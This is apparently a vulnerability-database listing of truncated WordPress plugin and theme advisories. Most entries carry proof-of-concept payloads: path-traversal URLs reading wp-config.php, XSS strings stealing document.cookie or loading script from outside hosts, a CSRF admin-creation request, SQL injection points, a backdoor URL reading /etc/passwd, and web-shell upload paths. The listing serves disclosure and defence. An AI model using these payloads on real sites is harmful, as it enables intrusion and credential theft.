Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permissions or validate the file parameter, allowing unauthenticated users to download any file from the...
Aspose Cloud eBook Generator - File Download
The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/aspose-cloud-ebook-generator/asposepostsexporterdownload.php?file=../../../wp-config.php...
Ptengine <= 1.0.1 - Reflected Cross-Site Scripting (XSS)
The ptengine-real-time-web-analytics-and-heatmap WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...
Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User
The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...
MiwoFTP - File & Folder Manager <= 1.0.4 - Arbitrary File Disclosure
A hook is added to ‘init’ in the file ‘miwoftp/miwoftp.php’. This hook is triggered whenever a user visits the front end of the site. The function specified in this hook will proceed to allow the user to download a file within the scope of the home directory of the site. Various values from the G...
Fraction Theme < 1.1.2 - Privilege Escalation
This vulnerability allows an attacker, either authenticated or unauthenticated, to escalate privileges on the site and obtain an admin account, which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...
Photocrati Theme 4.x.x - SQL Injection
http://www.example.com/wp-content/themes/photocrati-theme-path/ecomm-sizes.php?prodid=SQL...
Quasar Theme Rock Form Builder plugin - Privilege Escalation
The Rock Form Builder plugin 1.0 is used within the Quasar WooCommerce theme 1.9.1. Authenticated users can modify WordPress settings which can lead to full site compromise. It's unclear which exact version of the rock-form-builder fixed the issue, but it was something in between 1.0 and 2.5, so...
WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF
Any registered user can delete all WordPress database tables and files. This request makes it possible: http://wp.dev/wp-admin/admin-ajax.php?action=uninstall...
Wordpress Video Gallery <= 2.7 - SQL Injection
The contus-video-gallery WordPress plugin was affected by a SQL Injection security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=rss&type=video&vid=SQLi...
PowerPress Podcasting < 6.0.1 - Cross-Site Scripting (XSS)
The PowerPress Podcasting plugin by Blubrry WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. /wp-admin/admin.php?page=powerpress/powerpressadmincategoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--alert0x014068...
WPtouch <= 3.6.6 - Unvalidated Open Redirect
The WPtouch WordPress plugin was affected by an Unvalidated Open Redirect security vulnerability. http://www.example.com/?wptouchswitch=mobile&redirect=http%3A%2F%2Fdomain.com...
Photo Gallery <= 1.2.8 - Multiple Authenticated Reflected XSS
The Photo Gallery by 10Web – Mobile-Friendly Image Gallery WordPress plugin was affected by a Multiple Authenticated Reflected XSS security vulnerability. /wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg,jpeg,png,gif&callback=bwgaddpreviewimage&sortby=name";alert1...
Feedweb 2.4.1-3.0.6 - SQL Injection
The feedweb WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/feedweb/widgetcontainer.php?pid= Inject here &ishp=true...
GI-Media Library <= 2.2.2 - Arbitrary File Download
The gi-media-library WordPress plugin was affected by an Arbitrary File Download security vulnerability. /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA== Where "Li4vLi4vLi4vd3AtY29uZmlnLnBocA==" is "../../../wp-config.php" Base64 encoded...
Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://localhost:8080/?pageid=0&&errorsfu-disallowed-mime-type0name=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E...
SEO Redirection < 2.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise the referer link from requests before displaying it in the 'Settings SEO Redirection Redirection History' page. This results in a Stored Cross-Site Scripting (XSS) issue. This cURL request to a redirected page with a custom referer makes it possible: curl -H 'Referer:...
ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
The vulnerability is caused by improper filtering of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php...
Wordpress CodeArt Google MP3 Player - File Disclosure
The google-mp3-audio-player WordPress plugin was affected by a File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/google-mp3-audio-player/directdownload.php?file=../../../wp-config.php...
WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
" onmouseover="alert'hello';"...
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
The plugin does not validate and sanitise the CMDsearch parameter, which is used to create a custom function. This allows an attacker to run arbitrary commands on the remote server. GET /cmdownloads/?CMDsearch=".phpinfo." HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Windows NT 6.3; WOW64; rv:33.0...
Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal
v0.9.2 added a check to disallow direct access to the affected file. However, the path traversal was not fixed. The plugin has been closed from the repository. Choose File to upload : Directory :...
NativeChurch Theme - Arbitrary File Download
The NativeChurch WordPress theme was affected by an Arbitrary File Download security vulnerability. https://example.com/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php...
WordPress 3.5-3.7.1 - XML-RPC Denial of Service
KenBurner Slider - Unauthenticated Arbitrary File Download
The WordPress plugin KenBurner Slider suffers from an Arbitrary File Download vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...
wp-FileManager <= 1.3.0 - File Download
The wp-filemanager WordPress plugin was affected by a File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download...
WordPress 2.1.1 - Command Execution Backdoor
http://www.example.com/wp-includes/feed.php?ix=phpinfo; http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd...
Real Estate by Templatic - CSRF File Upload
The realestate WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/Realestate/images/tmp/yourshell.php...
Specialist by Templatic - CSRF File Upload
The specialist WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/specialist/images/tmp/yourshell.php...
slidedeck2 < 2.1.20130313 - XSS in ZeroClipboard
The SlideDeck 2 Lite Responsive Content Slider WordPress plugin was affected by an XSS in ZeroClipboard security vulnerability. /wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id="catcheif!self.aself.a=!alertdocument.cookie//&width&height...
BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the view and cattitle POST parameters when creating or editing a category at /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...
5star by Templatic - CSRF File Upload
The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/5star/images/tmp/yourshell.php...
BSK PDF Manager < 1.5 - Multiple Authenticated SQL Injections
The plugin did not use prepared statements with the categoryid and pdfid parameters when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs pages, leading to Authenticated SQL Injection issues...
Dailydeal by Templatic - CSRF File Upload
The dailydeal WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/dailydeal/images/tmp/yourshell.php...
Nightlife by Templatic - CSRF File Upload
The nightlife WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability. File Access: https://example.com/wp-content/themes/nightlife/images/tmp/yourshell.php...
Video Posts Webcam Recorder < 1.55.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Video Posts Webcam Recorder WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. https://example.com/wp-content/plugins/video-posts-webcam-recorder/posts/videowhisper/rlogout.php?message=message'//...
Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion
The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php...
Tera Charts 0.1 - Unauthenticated Remote Path Traversal File Disclosure
The tera-charts WordPress plugin was affected by an Unauthenticated Remote Path Traversal File Disclosure security vulnerability. http://www.example.com/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php...
Ruven Toolkit <= 1.1 - tinymce/popup.php popup Parameter Reflected XSS
The ruven-toolkit WordPress plugin was affected by a tinymce/popup.php popup Parameter Reflected XSS security vulnerability. http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup'alertdocument.cookie&...
WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?apiurl=apiurl%27%3E%3Cscript%3Ealert%284%29%3C/script%3E...
Prostore < 1.1.3 - Open Redirection
The prostore WordPress theme was affected by an Open Redirection security vulnerability. /wp-content/themes/prostore/go.php?https://example.com...
Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpiedebug.php?url=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E...
Podcast Channels < 0.28 - Unauthenticated Reflected XSS
The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://127.0.0.1/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability...
WP Planet <= 0.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp-planet/rss.class/scripts/magpiedebug.php?url=alert1...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html, with the payload in the test.html file controlled by the attacker...
Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E...
WP e-Commerce Swipe <= 3.1.0 - Multiple XSS Issues
The last time it was checked the plugin was still affected and had been closed...